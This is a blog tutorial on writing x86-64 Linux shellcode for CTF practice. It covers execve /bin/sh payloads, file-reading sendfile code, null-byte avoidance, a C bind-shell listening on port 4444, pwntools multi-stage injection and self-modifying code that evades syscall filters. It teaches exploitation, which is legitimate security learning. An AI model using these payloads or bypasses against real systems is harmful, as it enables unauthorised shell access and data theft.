Shellcoding

Created On 29. May 2021

Updated: 2021-06-28 01:20:57.425293000 +0000

Created By: acidghost

A shellcode is used to execute a shell within a system, either standalone or injected in an executable. A common practice is to set up remote shells where the attacker gains access to the target. Shellcode can be also used to alter the output of a program in form of exploits.
One of the first major uses of shellcoding was observed back in 1988 with the Morris Worm that brought down the internet. For those times, it was a complex worm that used buffer overflow vulnerability to inject shellcode and propagate itself among the connected hosts. You can also play with the worm yourself, see more how to do this in this post.

Good shellcode is compact and clean. Continuous practice and knowledge of x86-64 assembly is necessary. Unfortunately, many people, when they hear shellcode, first thing what comes into mind is copying and pasting it, as for example from here http://shell-storm.org/shellcode/. Then they might need a lot of time and luck to quickly debug and adapt it, because they are not familiar with what had the person in mind when building it. However, true masters know how to write their own shellcode from scratch. How one can write such is limited only by imagination.

Let's check an example compiled on a Linux system using the Intel syntax:

.global _start
_start: 
.intel_syntax noprefix
	mov rax, 60
	mov rdi, 42
	syscall

Save this in a file "shellcode.s" and compile like this

$ gcc -static -nostdlib -o shellcode-elf shellcode.s

Now execute the elf file with ./shellcode-elf and you will see that the process exited with 42.
First 60 was moved into rax (the return register). Here it is specified the syscall with number 60 (which stands for sys_exit) will be returned when calling the syscall instruction at the end.
A full list with a syscall table for x86-64 can be found here https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/.
42 is passed as argument into rdi. Executing the elf file will trigger an exit call with code 42.

To execute a shell session the assembly can be:

.global _start
_start: 
.intel_syntax noprefix
	mov rax, 59
	lea rdi, [binsh]
	mov rsi, 0
	mov rdx, 0
	syscall

binsh:
	.string "/bin/sh"

Executing the resulting elf file will spawn a shell. The string "/bin/sh" is passed as an argument into rdi, and rsi and rdx are left with 0. The execve syscall that is moved into rax requires 3 arguments to be passed, but the instructions for rsi and rdx can be left out as well, since this will default to 0 as well.
Let's check another example where we are opening a file:

mov rbx, 0x0000656c69662f2e   # push "./file" filename
push rbx
mov rax, 2    # syscall number of open
mov rdi, rsp  # point the first argument at stack (where we have "./file")
mov rsi, 0    # NULL out the second argument (meaning, O_RDONLY)
syscall       # trigger open("/flag", NULL)
mov rdi, 1    # first argument to sendfile is the file descriptor to output to (stdout)
mov rsi, rax  # second argument is the file descriptor returned by open
mov rdx, 0    # third argument is the number of bytes to skip from the input file
mov r10, 1000 # fourth argument is the number of bytes to transfer to the output file
mov rax, 40   # syscall number of sendfile
syscall        # trigger sendfile(1, fd, 0, 1000)
mov rax, 60    # syscall number of exit
syscall         # trigger exit()

The above code in C is:

int main() {sendfile(1, open("./file", 0), 0, 1000); }

At the beginning of sendfile, 1 stays for standard output, that is written from the following open starting at the offset 0 with a byte length of 1000.

There are different ways to write shellcode, but in most cases when you need to adjust it manually, assembly will be your best friend.
Running it successfully is often challenging by two limitations: the shellcode has to be byte free and it is often restricted by a specific size of a buffer where it will be inserted.

Byte Free Shellcode

Why does it have to byte free? It should not contain any 0s and few other bytes, because the program will interpret them as strings and exit. There are certain read functions from the executable that will end the shellcode execution if it has some specific bytes. Here are a few of them:

Null byte \0 (0x00) - strcopy
Newline \n (0x0a) - scanf, gets, getline, fgets
Carriage return \r (0x0d) scanf

There are also many other characters that can break our shellcode. So, how do we make sure to avoid this kind of situations? Here are few examples:

BAD		GOOD
1. mov rax, 0		1. xor rax, rax
2. mov rbx,0x67616c662f		2. mov ebx, 0x67616c66; shl rbx, 8
		mov bl, 0x2f

In the first example, moving 0 into rax is a bad practice because 0 leaves a trail of 0 bytes. This is also true when moving other numbers. Xoring rax against rax will cut out those bytes.
In the second example, the word "/flag" is moved into ebx. Notice that the word is backwards since that's how values are stored in little endian. Then ebx is shifted by 8 bits to the left and the forward slash (2f) is moved in at the end in bl.
This is useful when certain bytes are forbidden. Such workarounds leave a lot of options on how to craft a shellcode.

To allow easier to debug the shellcode, leave the .text part writable:

$ gcc -Wl, -N --static -nostdlib -o test test.s

By passing the -Wl and N, we are allowing the text part to be writable.

Retricted Size of Shellcode

Very often there is a restriction on the amount of bytes the shellcode can have and this is where 8 bit registers come in handy. Not just the 8bit registers, but also diversifying and xoring, poping, pushing and even xchging can greatly help reduce its size. Pushing and Poping does not only reduce its size, but if pushed a value into the stack and then popped it into register it will be 0ed out as well.
Remember, bl will go as single byte into rax, bx as 2-byte word, ebx as 4-byte dword and rbx as 8-byte qword.

Injecting the Shellcode

to inject the shellcode as a raw file, it is needed to extract the .text section from the elf file. It can be done like this:

$ objcopy --dump-section .text=shellcode-raw shellcode-elf

The resulting shellcode-raw file will be the bytes that are used to inject as a part of exploits.
One way to write the shellcode-raw file can be achieved with cat. Pwncollege from which this post was heavily inspired, has a repository and a CTF with vulnerable files to practice your shellcode on! Check them out here. To inject the shellcode with cat, you can do the following:

$ cat shellcode-raw | ./target_file

Debugging

When something goes wrong with our code, we must debug it. We can quickly check what went wrong with it during the execution, if use the command strace. Another tool, would be your preferred reversing software, and I will briefly mention some tricks how to debug the shellcode with gdb. Launch it like this

$ gdb ./shellcode-elf

Then start it with start and run it with r. When the process crashed, we can look in rip where the execution stopped with x/i $rip. Vanilla gdb doesn't have an UI, but it is still very powerful. It can be turned also in a poor man's objdump by printing the next 8 executed instructions for example, like this x/8i $rip. Step one instruction with ni and break at a specific address with break *0x4000. Also, as mentioned in the Assembly References, we can use labels within our shellcode to debug it easier. We can also hardcode breakpoints with int3. Inserting it analogous to a label at a specific place in the assembly program will automatically break it there. In a later post, I will list more possibilities that this tool can do.

Port Binding Shellcode

While a port binding shellcode is one of the most primitive techniques out there, this still requires extended knowledge and research to be constructed well. First of all, we have to think how our shellcode will work. It can be built somewhat simpler, where mostly the bytes containing the strings needed for the execution are pushed around as described in this article, or by prototyping first in a more high level language and then passing it into assembly. A working prototype as such, can be then used as pseudo code to construct the assembly code step by step. Below is an implementation in C of port binding:

#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <unistd.h>

int main()
{
    // Create addr struct
    struct sockaddr_in addr;
    addr.sin_family = AF_INET;
    addr.sin_port = htons(4444); // Port
    addr.sin_addr.s_addr = htonl(INADDR_ANY); // Listen on any interface

    // Create socket
    int sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    // Bind socket
    bind(sock, (struct sockaddr *) &addr, sizeof(addr));
    listen(sock,0);

    // Accept connection
    int fd = accept(sock, NULL, NULL);

    // loop through stdin/stdout/stderr to socket
    int i; 
    for (i = 2; i >= 0; i--){
    dup2(fd, i);
    }
    // Duplicate stdin/stdout/stderr to socket
    execve("/bin/sh", NULL, NULL);
}

In few words, this will connect and listen to the port 4444. It can be compiled with gcc -o port_bind port_bind.c and then after chmoding and executing it, firing from another terminal nc -nv 127.0.0.1 4444 will establish a connection. (you should see "Connection to 127.0.0.1 4444 port [tcp/*] succeeded! and then run a command for example ls to see that you can list the path and it works)

To pass this into assembly, we have to think which instructions can be used for each functions. We can ease this task by stracing the execution of the program with strace port_bind and analyzing the library calls that are triggered. We have also to figure which syscalls can be used for each of functions. I won't be buidling a port binding shellcode in assembly here, and will leave this task to the reader. There are numerous references on this topic and you can see a good explanation analagous to the C code above here. Besides, you can look up in references below, to see more posts on how such shellcode can be built.
https://infosecwriteups.com/expdev-bind-tcp-shellcode-cebb5657a997
https://snowscan.io/tcp-bind-shellcode/
https://www.soldierx.com/bbs/201809/Art-Shellcoding-and-Port-Binding
https://adriancitu.com/2015/09/14/how-to-write-a-port-biding-shellcode/

Multi Stage Shellcode

A multi stage shellcode allows the attacker to inject a chain of payloads that can allow to bypass different constraints. Sometimes it is hard to get the value of rip, in such way we can craft a stage1 in pwntools in such way:

stage1 = pwn.asm("""
        mov rax, 0
        mov rdi, 0
        lea rsi, [rip]
        mov rdx, 1000
        syscall
""")

Pwntools also has an interesting function shellcraft. It can generate different generic types of shellcode, and it is nice to know about it, but in practice shouldn't be used much. For demonstration purposes, I will show how it it can be used. As a stage 2 shellcode, we can use the built in readfile assembly in shellcraft. The assembly contents of how this function can be checked, and let's see how it will look when applied against a file ./file opened with a file descriptor 1.

In [1]: import pwn
In [2]: print(pwn.shellcraft.readfile('./file', 1))
    /* Save destination */
    push 1
    pop edi

    /* push b'file\x00' */
    push 1
    dec byte ptr [esp]
    push 0x656c6966

    /* call open('esp', 'O_RDONLY') */
    push (SYS_open) /* 5 */
    pop eax
    mov ebx, esp
    xor ecx, ecx
    int 0x80

    /* Save file descriptor for later */
    mov ebp, eax

    /* call fstat('eax', 'esp') */
    mov ebx, eax
    push (SYS_fstat) /* 0x6c */
    pop eax
    mov ecx, esp
    int 0x80

    /* Get file size */
    add esp, 20
    mov esi, [esp]

    /* call sendfile('edi', 'ebp', 0, 'esi') */
    xor eax, eax
    mov al, 0xbb
    mov ebx, edi
    mov ecx, ebp
    cdq /* edx=0 */
    int 0x80

Then it can be used as a stage 2 shellcode. Let's check from the beginning how the whole process will look in pwntools:

In [1]: import pwn
In [2]: pwn.context.arch = 'amd64'
In [3]: proc = pwn.process('./target_file')
In [4]: stage1 = pwn.asm("""
        mov rax, 0
        mov rdi, 0
        lea rsi, [rip]
        mov rdx, 1000
        syscall
""")
In [5]: stage2 = pwn.asm(pwn.shellcraft.readfile('./file', 1))

We can also display the bytes of the shellcode by just typing stage1 and stage2
Next when we execute a file, we can read all of it's readable part before it we get asked for a return with:

In [6]: proc.clean()

or to read a certain number of bytes - 1000 in the case below:

In [6]: proc.read(4096)

Then we can write the stage1 like this:

In [7]: proc.write(stage1)

After that we can read again and write the stage 2 like this:

In [8]: proc.clean()
In [9]: proc.write(stage2)

Or if we need to include some no-op bytes before running the stage2, and reading what's there is not an option

In [9]: proc.write(b'\x90'*16 + stage2)
In [10]: proc.clean()

To have the output written to us more eloquently, we can also use readall() like this:

In [10]: print.(proc.readall().decode('latin1'))

Depending on the constraints we might read out that the attack failed or succeed in opening and reading the contents of the ./file that we are gaining access through the target_file. There are also many other, more sophisticated ways how to inject the shellcode. For example it can be done with echo as well:

( echo stage1; sleep1; echo stage2 ) | /.target_file

However, pwntools is usually an optimal alternative for most cases.

Self Mutating Shellcode

There are not many uses for programs that modify themselves during execution, because usually they are very hard to read. However, just like it can be used to add more security to a software, it can be also crafted to bypass constraints. For example, when certain system calls are forbidden, certain bytes can be incremented to trigger them at a later time during the execution. This can be done for example with a IP-relative addressing mode, where the relative distance of the address that contains the address we want to modify is known.
Let's take this example:

.global _start
.intel_syntax noprefix
_start:
        mov rax, 60
        mov rdi, 42
        inc byte ptr [eip+8]
        mov word ptr [eip], 0x050e

This is the code similar to the first one mentioned in this article. It works the same, but looks differently, why? Let's say that sometimes the opcode for syscall is forbidden. The opcode for it in x64 is 0f 05. To bypass this we can pass a different set of bytes into the buffer and with a IP-relative addressing mode, we can find it an change it during the execution. If we objdump the elf for this shellcode, we will see:
small
When we are incrementing the byte in [eip], this will point to the next instruction and +8 is the relative distance in bytes to the byte 0e that will be incremented. Since this is a self modifying code, we won't see in objdump 0f 05 as it will appear only during execution, and the code above will call sys_exit and exit with code 42. Interestingly and fairly enough, debugging such code is quite difficult. GDB for instance, modifies the code itself during the execution and usually it will be a bad way to deal with it. I will be tackling in another post how this can be debugged better.

Shellcode Mitigations and Remaining Injection Points

Shellcoding has become some form of an ancient art practiced by mysterious hackers. Before the 2000's, there wasn't a specific model for mitigating shellcode attacks. The shellcode attack vectors have drastically reduced with the introduction of memory permissions:

PROT_READ allows the process to read memory
PROT_WRITE allows the process to write memory
PROT_EXEC allows the process to execute memory

How the shellcode injection can still be used is situational. It depends on what the program is designed to do and on which type of architecture it runs. For example, the embedded devices still have often weak protection against it. Shellcode is usually used with other techniques. For example, one way is to trick the program into mprotect(PROT_EXEC) the shellcode and then jump to it. Another injection point is the Just in Time Compilation(JIT). JITs often need to regenerate the code that is executed. Since it requires higher speeds to execute the tasks, many specific security mitigations are not present. This leads to lots of Software having some of their memory to be readable, writable and executable. JIT is used a lot in browsers and such Software as Zoom, Discord etc. - it is relevant attack vector. Besides, shellcoding has some very powerful fundamentals that creates a basis for many other exploitation techniques such as Return Oriented Programming.

How to Practice Shellcoding

There are various ways how one can get better at shellcoding. There are few tools that can help to do this better.

Pwntools
As mentioned before, pwntools is a nice tool to analyze, debug and craft shellcode more efficinetly.
Rappel

It is an utility that allows experiment with instructions and see what gradual impact they can have on registers.
Shelltools
This is quite a sophisticated utility that can be used to analyze, assemble, disassemble and quite some other things with your shellcode. Analyzing it will disassemble in objdump the text section, hexdump it, align and wrap nicely the bytes in expressions that can be used directly in python 2,3 and C code, the size of the shellcode and strace it for you. You can also assemble some assembly directly with it, which will give you the same information:

$ ~/shelltools/assemble "mov rax, rsi"

It can be also used to inject shellcode into another file with such syntax:

( ~/shelltools/assemble -c "xor rsi, rsi; push rdx"; read; cat shellcode.raw ) | ./target_file

Further Reads and References
https://www.exploit-db.com/docs/english/21013-shellcoding-in-linux.pdf
https://www.vividmachines.com/shellcode/shellcode.html
https://idafchev.github.io/exploit/2017/04/14/writing_linux_shellcode.html
http://www.wryway.com/blog/mutating-existing-shellcodes/
http://www.dmi.unipg.it/bista/didattica/sicurezza-pg/buffer-overrun/hacking-book/0x2a0-writing_shellcode.html
https://pwn.college/modules/shellcode

Section: Binary Exploitation (PWN)

Back

Malware is stylish but can be bad for your system and cause permanent burns to motherboard components.